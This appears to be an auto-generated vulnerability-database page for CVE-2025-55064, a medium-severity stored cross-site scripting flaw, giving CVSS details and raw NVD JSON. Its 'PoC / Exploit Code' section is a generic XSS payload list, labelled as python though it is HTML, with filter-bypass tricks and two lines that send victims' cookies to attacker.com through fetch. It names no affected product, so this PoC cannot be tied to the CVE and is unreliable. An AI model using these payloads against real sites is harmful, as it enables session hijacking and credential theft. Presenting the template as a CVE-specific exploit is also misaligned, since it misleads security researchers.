Security Vulnerability Report
中文
CVE-2025-55064 CVSS 4.8 MEDIUM

CVE-2025-55064

Published: 2025-12-29 18:15:44
Last Modified: 2026-04-15 00:35:42

Description

CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

未知版本(需进一步分析目标应用)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-55064 PoC - Stored XSS --> <!-- Attacker with high privileges injects malicious script --> <script>alert(document.cookie)</script> <!-- Or using event handlers --> <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"> <!-- SVG-based payload --> <svg/onload=fetch('//attacker.com/log?data='+btoa(document.cookie))> <!-- Filter bypass payloads --> <scr<script>ipt>alert(1)</scr</script>ipt> <svg><script>alert(String.fromCharCode(88,83,83))</script></svg> <!-- Data URI payload --> <a href="data:text/html,<script>alert(document.domain)</script>">Click</a> <!-- DOM-based XSS --> <div id="output"></div> <script>document.getElementById('output').innerHTML=location.hash.slice(1)</script> <!-- PoC URL for reflected XSS --> <!-- https://vulnerable-site.com/search?q=<script>alert(document.cookie)</script> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55064", "sourceIdentifier": "[email protected]", "published": "2025-12-29T18:15:43.500", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0", "source": "[email protected]"}]}}